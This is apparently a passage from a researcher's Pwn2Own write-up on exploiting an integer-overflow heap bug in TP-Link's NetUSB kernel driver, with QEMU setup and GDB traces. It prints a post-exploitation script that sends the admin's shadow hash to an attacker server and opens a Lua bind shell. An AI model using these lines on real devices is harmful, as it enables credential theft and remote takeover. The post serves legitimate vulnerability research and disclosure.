Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.
Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.
Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.
I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.
intkc_printf(constchar*a1,...){// ...v1=vsprintf(v6,a1);v2=v1<257;v3=v1+1;if(!v2){v6[256]=0;v3=257;}v5=v3;kc_dbgD_send(&v5,v3+4);// <-- send over socketreturnprintk("<1>%s",v6);}
Pretty funny right?
Booting NetUSB in QEMU
Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?
Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.
Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.
I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.
Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.
structnet_device{// ...#ifdef CONFIG_WIRELESS_EXT/* List of functions to handle Wireless Extensions (instead of ioctl). * See <net/iw_handler.h> for details. Jean II */conststructiw_handler_def*wireless_handlers;/* Instance data managed by the core of Wireless Extensions. */structiw_public_data*wireless_data;#endif// ...#if IS_ENABLED(CONFIG_VLAN_8021Q)structvlan_info__rcu*vlan_info;/* VLAN info */#endif#if IS_ENABLED(CONFIG_NET_DSA)structdsa_switch_tree*dsa_ptr;/* dsa specific data */#endif// ...#ifdef CONFIG_SYSFSstructkset*queues_kset;#endif#ifdef CONFIG_RPSstructnetdev_rx_queue*_rx;/* Number of RX queues allocated at register_netdev() time */unsignedintnum_rx_queues;/* Number of RX queues currently active in device */unsignedintreal_num_rx_queues;#ifdef CONFIG_RFS_ACCEL/* CPU reverse-mapping for RX completion interrupts, indexed * by RX queue number. Assigned by driver. This must only be * set if the ndo_rx_flow_steer operation is defined. */structcpu_rmap*rx_cpu_rmap;#endif#endif//...};
Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.
After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:
For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones):
- I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing.
- I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz.
- You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.
Enters Zenith
Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.
I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet socketsAndrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.
I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:
void*SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t*SbusConnection,charHostCommand,charOpcode){// ...switch(OpcodeMasked){case0x50:if(SoftwareBus_fillBuf(SbusConnection,ReceiveBuffer,4)){ReceivedSize=_bswapw(*(uint32_t*)ReceiveBuffer);AllocatedBuffer=_kmalloc(ReceivedSize+17,208);if(!AllocatedBuffer){returnkc_printf("INFO%04X: Out of memory in USBSoftwareBus",4296);}// ...if(!SoftwareBus_fillBuf(SbusConnection,AllocatedBuffer+16,ReceivedSize))
Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.
The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.
My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:
This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:
This is what it looks like in GDB once q->head.next/prev has been corrupted:
(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00
(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff
(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)
Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
3375 kernel/sched/core.c: No such file or directory.
(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
prev = 0xbaadc0d1}}
(gdb) bt
#0 __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
#1 0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2 0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3 tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4 0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5 0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6 0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7 pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8 pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9 0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34
Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.
The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):
#!/bin/shexportLPORT=31337
wgethttp://{ip_local}:8000/pwd?$(grep-Eadmin:/etc/shadow)
lua-e'local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();'
The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).
OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough.
I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:
Beautiful. Time to register!
Entering the contest
As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up.
At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮💨.
When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.
On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.
Wrapping up
Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:
Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again.
Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively.
The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
Higher payouts don't necessarily mean a harder target.
You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:
I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.